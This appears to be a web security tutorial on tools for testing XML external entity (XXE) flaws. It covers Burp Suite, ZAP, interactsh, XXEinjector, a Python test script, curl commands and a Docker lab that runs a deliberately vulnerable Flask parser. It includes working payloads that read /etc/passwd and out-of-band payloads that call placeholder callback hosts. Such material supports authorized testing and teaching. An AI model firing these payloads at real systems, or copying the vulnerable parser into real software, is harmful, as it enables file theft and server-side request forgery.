🔵Info0.0

XXE Testing Tools

Comprehensive guide to tools and frameworks for testing XXE vulnerabilities, from manual testing tools to automated scanners.

CWE-611: Improper Restriction of XML External Entity ReferenceOWASP Top 10:2021 - A05: Security Misconfiguration

Overview

Effective XXE testing requires a combination of manual techniques and automated tools. This guide covers essential tools for XXE detection, exploitation, and validation.

Tool Categories:

  • Proxy Tools - Burp Suite, OWASP ZAP for request manipulation
  • OOB Platforms - Burp Collaborator, interactsh for blind XXE
  • Exploitation Tools - XXEinjector, automated exploitation
  • Scanners - Automated vulnerability detection
  • Custom Scripts - Python/Ruby scripts for specific scenarios

Testing Workflow:

  1. Manual Testing - Use proxy to craft and send payloads
  2. OOB Detection - Set up callback infrastructure
  3. Automated Scanning - Run scanners for comprehensive coverage
  4. Exploitation - Use specialized tools for confirmed vulnerabilities
  5. Validation - Verify findings manually

Recommended Setup:

  • Primary: Burp Suite Professional (or Community Edition)
  • OOB: Burp Collaborator or interactsh.com
  • Automation: Custom scripts + scanners
  • Documentation: Note-taking tool for findings

Burp Suite (Primary Tool)

Burp Suite for XXE Testing: Burp Suite is the industry-standard web application security testing tool, essential for XXE testing.

Key Features:

  • Proxy - Intercept and modify XML requests
  • Repeater - Resend requests with modified payloads
  • Collaborator (Pro) - Out-of-band interaction detection
  • Scanner (Pro) - Automated XXE detection
  • Intruder - Payload iteration and fuzzing

Burp Suite Editions:

  • Community Edition - Free, includes Proxy and Repeater
  • Professional - Paid, includes Collaborator and Scanner

XXE Testing Workflow:

  1. Intercept XML request in Proxy
  2. Send to Repeater
  3. Inject XXE payload
  4. Send request, analyze response
  5. Use Collaborator for blind XXE
  6. Document findings

Burp Collaborator:

  • Generates unique subdomain for OOB testing
  • Captures HTTP, DNS, and SMTP interactions
  • Ideal for blind XXE detection
  • Automatically correlates callbacks with requests

Burp Suite XXE Testing Workflow

TEXTburp-workflow.txt✓ Secure
1# Burp Suite XXE Testing Step-by-Step
2
3## 1. Proxy Setup
4- Configure browser to use Burp proxy (127.0.0.1:8080)
5- Enable intercept in Proxy tab
6- Navigate to target application
7
8## 2. Identify XML Endpoint
9- Look for POST requests with Content-Type: application/xml
10- Check API endpoints, SOAP services
11- Intercept file upload requests (SVG, DOCX, etc.)
12
13## 3. Inject XXE Payload
14- Right-click intercepted request → Send to Repeater
15- In Repeater, modify XML body:
16  
17  Original:
18  <?xml version="1.0"?>
19  <root>
20    <data>test</data>
21  </root>
22  
23  Modified:
24  <?xml version="1.0"?>
25  <!DOCTYPE root [
26    <!ENTITY xxe SYSTEM "file:///etc/passwd">
27  ]>
28  <root>
29    <data>&xxe;</data>
30  </root>
31
32## 4. Send and Analyze
33- Click "Send" in Repeater
34- Check response for file contents
35- Look for error messages revealing paths
36- Note response time changes
37
38## 5. Burp Collaborator (Pro Only)
39- Click "Burp Collaborator client" in Burp menu
40- Click "Copy to clipboard" to get unique domain
41- Inject payload with Collaborator domain:
42  
43  <!DOCTYPE root [
44    <!ENTITY xxe SYSTEM "http://BURP-COLLAB-SUBDOMAIN.burpcollaborator.net/xxe">
45  ]>
46  <root><data>&xxe;</data></root>
47  
48- Send request
49- Check Collaborator client for HTTP requests
50- Interaction = Blind XXE confirmed
51
52## 6. Scanner (Pro Only)
53- Right-click request → "Do active scan"
54- Scanner will automatically test XXE payloads
55- Review findings in "Target" → "Site map"
56
57## 7. Document Findings
58- Take screenshots of successful payloads
59- Note exact request/response
60- Document impact (files read, SSRF capabilities)
61- Export requests for report

OWASP ZAP (Free Alternative)

OWASP ZAP for XXE Testing: Free, open-source alternative to Burp Suite with XXE detection capabilities.

Key Features:

  • Intercepting Proxy - Intercept and modify requests
  • Active Scanner - Automated vulnerability scanning
  • Fuzzer - Payload fuzzing capabilities
  • API Support - Script and automate testing
  • 100% Free - No paid tier

XXE in ZAP:

  • Built-in active scan rules for XXE
  • Can intercept and modify XML requests
  • Supports custom payloads via fuzzer
  • API for automation

Limitations vs Burp:

  • No built-in OOB platform (need external service)
  • Scanner less comprehensive
  • UI less polished

When to Use:

  • Budget constraints
  • Open-source requirements
  • Automated scanning in CI/CD
  • Basic manual testing

Interactsh (Free OOB Platform)

Interactsh for Blind XXE: Free, open-source platform for detecting out-of-band interactions.

What is Interactsh:

  • Free alternative to Burp Collaborator
  • Detects HTTP, DNS, SMTP interactions
  • Web interface and CLI available
  • Self-hostable or use public instance

Usage:

  1. Visit interactsh.com or run CLI
  2. Generate unique domain (e.g., abc123.oast.fun)
  3. Use in XXE payload: 
    <!ENTITY xxe SYSTEM "http://abc123.oast.fun/xxe">
  4. Check interactsh for interactions
  5. HTTP/DNS request = blind XXE confirmed

CLI Usage:

# Install
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

# Run
interactsh-client

# Use generated domain in XXE payload
# Watch for interactions in terminal

Self-Hosting:

  • Full control over data
  • No reliance on third-party service
  • Customizable domain
  • Docker deployment available

XXEinjector (Automated Exploitation)

XXEinjector: Ruby-based tool for automated XXE exploitation and data exfiltration.

Features:

  • Automated file disclosure via XXE
  • OOB data exfiltration
  • Enumerates files and directories
  • Supports various encoding schemes
  • SSRF exploitation
  • Java jar:// and netdoc:// exploitation

Installation:

git clone https://github.com/enjoiz/XXEinjector.git
cd XXEinjector
gem install nokogiri

Basic Usage:

# Enumerate files
ruby XXEinjector.rb --host=192.168.1.100 --path=/api/xml --file=/tmp/request.txt --enumerate

# Read specific file
ruby XXEinjector.rb --host=192.168.1.100 --path=/api/xml --file=/tmp/request.txt --target=/etc/passwd

# OOB exploitation
ruby XXEinjector.rb --host=192.168.1.100 --path=/api/xml --file=/tmp/request.txt --oob=http --phpfilter

When to Use:

  • Confirmed XXE vulnerability
  • Need to extract multiple files
  • Automated data exfiltration
  • Testing blind XXE variants

Limitations:

  • Requires Ruby environment
  • Can be noisy (multiple requests)
  • May trigger rate limiting
  • Requires manual request template

Custom Python Scripts

Pythonxxe_test.py✓ Secure
1#!/usr/bin/env python3
2"""Simple XXE testing script"""
3
4import requests
5import sys
6
7def test_xxe(url, file_path):
8    """
9    Test XXE vulnerability by attempting file disclosure
10    
11    Args:
12        url: Target URL that accepts XML
13        file_path: File to attempt to read (e.g., /etc/passwd)
14    """
15    
16    # XXE payload
17    payload = f'''<?xml version="1.0" encoding="UTF-8"?>
18<!DOCTYPE root [
19  <!ENTITY xxe SYSTEM "file://{file_path}">
20]>
21<root>
22  <data>&xxe;</data>
23</root>'''
24    
25    headers = {
26        'Content-Type': 'application/xml',
27        'User-Agent': 'XXE-Tester/1.0'
28    }
29    
30    try:
31        print(f"[*] Testing XXE on {url}")
32        print(f"[*] Attempting to read: {file_path}")
33        
34        response = requests.post(
35            url,
36            data=payload,
37            headers=headers,
38            timeout=10
39        )
40        
41        print(f"[*] Status Code: {response.status_code}")
42        print(f"[*] Response Length: {len(response.text)}")
43        
44        # Check if file contents in response
45        if 'root:' in response.text or 'daemon:' in response.text:
46            print("[+] VULNERABLE! File contents found in response:")
47            print(response.text[:500])  # First 500 chars
48            return True
49        else:
50            print("[-] No file contents detected")
51            print("[*] Response preview:")
52            print(response.text[:200])
53            return False
54            
55    except requests.exceptions.RequestException as e:
56        print(f"[!] Error: {e}")
57        return False
58
59def test_xxe_oob(url, callback_url):
60    """
61    Test blind XXE with out-of-band callback
62    
63    Args:
64        url: Target URL
65        callback_url: Your server URL (or Burp Collaborator)
66    """
67    
68    payload = f'''<?xml version="1.0" encoding="UTF-8"?>
69<!DOCTYPE root [
70  <!ENTITY xxe SYSTEM "{callback_url}">
71]>
72<root>
73  <data>&xxe;</data>
74</root>'''
75    
76    headers = {'Content-Type': 'application/xml'}
77    
78    try:
79        print(f"[*] Testing blind XXE on {url}")
80        print(f"[*] Callback URL: {callback_url}")
81        print("[*] Check your server logs for incoming request")
82        
83        response = requests.post(url, data=payload, headers=headers, timeout=10)
84        print(f"[*] Request sent. Status: {response.status_code}")
85        print("[*] Check callback server for interaction")
86        
87    except requests.exceptions.RequestException as e:
88        print(f"[!] Error: {e}")
89
90if __name__ == "__main__":
91    if len(sys.argv) < 2:
92        print("Usage: python xxe_test.py <url> [file_path]")
93        print("Example: python xxe_test.py http://target.com/api/xml /etc/passwd")
94        sys.exit(1)
95    
96    url = sys.argv[1]
97    file_path = sys.argv[2] if len(sys.argv) > 2 else "/etc/hostname"
98    
99    # Test classic XXE
100    test_xxe(url, file_path)
101    
102    # Test blind XXE (replace with your callback URL)
103    # test_xxe_oob(url, "http://YOUR-SERVER.com/xxe")

Command-Line Testing with curl

Bashxxe_curl_test.sh✓ Secure
1#!/bin/bash
2# XXE testing with curl
3
4# Basic XXE test - file disclosure
5curl -X POST http://target.com/api/xml \
6  -H "Content-Type: application/xml" \
7  -d '<?xml version="1.0"?>
8<!DOCTYPE root [
9  <!ENTITY xxe SYSTEM "file:///etc/passwd">
10]>
11<root><data>&xxe;</data></root>'
12
13# XXE with OOB callback
14curl -X POST http://target.com/api/xml \
15  -H "Content-Type: application/xml" \
16  -d '<?xml version="1.0"?>
17<!DOCTYPE root [
18  <!ENTITY xxe SYSTEM "http://YOUR-SERVER.com/xxe">
19]>
20<root><data>&xxe;</data></root>'
21
22# Save payload to file for cleaner testing
23cat > xxe_payload.xml <<EOF
24<?xml version="1.0"?>
25<!DOCTYPE root [
26  <!ENTITY xxe SYSTEM "file:///etc/hostname">
27]>
28<root>
29  <data>&xxe;</data>
30</root>
31EOF
32
33# Send saved payload
34curl -X POST http://target.com/api/xml \
35  -H "Content-Type: application/xml" \
36  -d @xxe_payload.xml \
37  -v  # Verbose for headers and response
38
39# Test with timeout (useful for blind XXE)
40curl -X POST http://target.com/api/xml \
41  -H "Content-Type: application/xml" \
42  -d @xxe_payload.xml \
43  --max-time 5 \
44  -w "\nTime: %{time_total}s\n"
45
46# Follow redirects and save response
47curl -X POST http://target.com/api/xml \
48  -H "Content-Type: application/xml" \
49  -d @xxe_payload.xml \
50  -L \
51  -o response.txt
52
53echo "Response saved to response.txt"

Automated Security Scanners

Web Application Scanners with XXE Detection:

1. Burp Scanner (Professional)

  • Comprehensive XXE detection
  • Automatic payload generation
  • OOB interaction detection
  • Low false positive rate
  • Cost: Paid ($449/year)

2. OWASP ZAP

  • Active scanner with XXE rules
  • Free and open-source
  • API for CI/CD integration
  • Cost: Free

3. Acunetix

  • Commercial scanner
  • XXE detection capabilities
  • Detailed reporting
  • Cost: Paid (enterprise)

4. Netsparker

  • Automatic XXE detection
  • Proof-based scanning
  • Low false positives
  • Cost: Paid

5. Nikto

  • Free web server scanner
  • Limited XXE detection
  • Good for initial reconnaissance
  • Cost: Free

Scanner Limitations:

  • May miss custom XML parsing logic
  • Limited blind XXE detection
  • Can generate false positives
  • May not test all attack vectors

Best Practice: Combine automated scanning with manual testing for comprehensive coverage.

Docker Testing Environment

Bashdocker_setup.sh✓ Secure
1#!/bin/bash
2# Create isolated XXE testing environment with Docker
3
4# Create Dockerfile for vulnerable app (for testing purposes)
5cat > Dockerfile <<EOF
6FROM python:3.9-slim
7
8WORKDIR /app
9
10# Install dependencies
11RUN pip install flask lxml
12
13# Copy vulnerable app
14COPY vulnerable_app.py .
15
16EXPOSE 5000
17
18CMD ["python", "vulnerable_app.py"]
19EOF
20
21# Create vulnerable Flask app (for educational/testing purposes)
22cat > vulnerable_app.py <<'EOF'
23from flask import Flask, request
24from lxml import etree
25
26app = Flask(__name__)
27
28@app.route('/parse', methods=['POST'])
29def parse_xml():
30    # VULNERABLE: External entities enabled
31    parser = etree.XMLParser(resolve_entities=True, no_network=False)
32    
33    try:
34        xml_data = request.data
35        doc = etree.fromstring(xml_data, parser)
36        return f"Parsed: {etree.tostring(doc).decode()}", 200
37    except Exception as e:
38        return f"Error: {str(e)}", 400
39
40if __name__ == '__main__':
41    app.run(host='0.0.0.0', port=5000, debug=True)
42EOF
43
44# Build Docker image
45docker build -t xxe-test-app .
46
47# Run container
48docker run -d -p 5000:5000 --name xxe-test xxe-test-app
49
50echo "Vulnerable app running on http://localhost:5000/parse"
51echo "Test with: curl -X POST http://localhost:5000/parse -d @xxe_payload.xml"
52
53# Cleanup command
54echo "To stop: docker stop xxe-test && docker rm xxe-test"

Tool Comparison Matrix

XXE Testing Tool Comparison:

Manual Testing:

  • Burp Suite Pro - ⭐⭐⭐⭐⭐ (Best overall, paid)
  • Burp Suite Community - ⭐⭐⭐⭐ (Great, free, no Collaborator)
  • OWASP ZAP - ⭐⭐⭐ (Good, free, less polished)
  • curl - ⭐⭐⭐ (Simple, scriptable, manual)

OOB Detection:

  • Burp Collaborator - ⭐⭐⭐⭐⭐ (Best, integrated, paid)
  • Interactsh - ⭐⭐⭐⭐ (Excellent, free)
  • Custom Server - ⭐⭐⭐ (Full control, requires setup)

Automated Exploitation:

  • XXEinjector - ⭐⭐⭐⭐ (Powerful, requires Ruby)
  • Custom Scripts - ⭐⭐⭐ (Flexible, requires development)
  • Burp Scanner - ⭐⭐⭐⭐ (Automated, paid)

Scanners:

  • Burp Scanner - ⭐⭐⭐⭐⭐ (Most accurate, paid)
  • OWASP ZAP Scanner - ⭐⭐⭐ (Good, free)
  • Acunetix - ⭐⭐⭐⭐ (Commercial, expensive)
  • Nikto - ⭐⭐ (Basic, free)

Recommended Setup:

  • Budget: OWASP ZAP + Interactsh + Custom scripts
  • Professional: Burp Suite Pro + Custom scripts
  • Enterprise: Burp Suite Pro + Commercial scanner + CI/CD integration

XXE Testing Toolkit Checklist

Essential Tools:Intercepting Proxy • Burp Suite Pro/Community OR OWASP ZAP • Configured and tested • Browser proxy settings configured

OOB Platform • Burp Collaborator (if Pro) OR • Interactsh account/CLI OR • Custom server with logging • Tested and accessible

Command-Line Tools • curl installed • wget installed • Basic payload files created

Scripting Environment • Python 3.x installed • Requests library installed (pip install requests) • Basic XXE test script ready

Optional Advanced Tools • XXEinjector (if testing confirmed XXE) • Docker (for testing environments) • Automated scanner

Configuration: ☐ Proxy certificate installed in browser ☐ OOB platform tested and working ☐ Payload templates prepared ☐ Note-taking tool ready (Obsidian, CherryTree, etc.) ☐ Screenshot tool configured

Pre-Testing: ☐ Written authorization obtained ☐ Scope clearly defined ☐ Tools tested on safe target first ☐ Backup plan if tools cause issues ☐ Communication channel with team established

Related Topics

Testing MethodologyPayload DesignBlind XxeClassic Xxe

References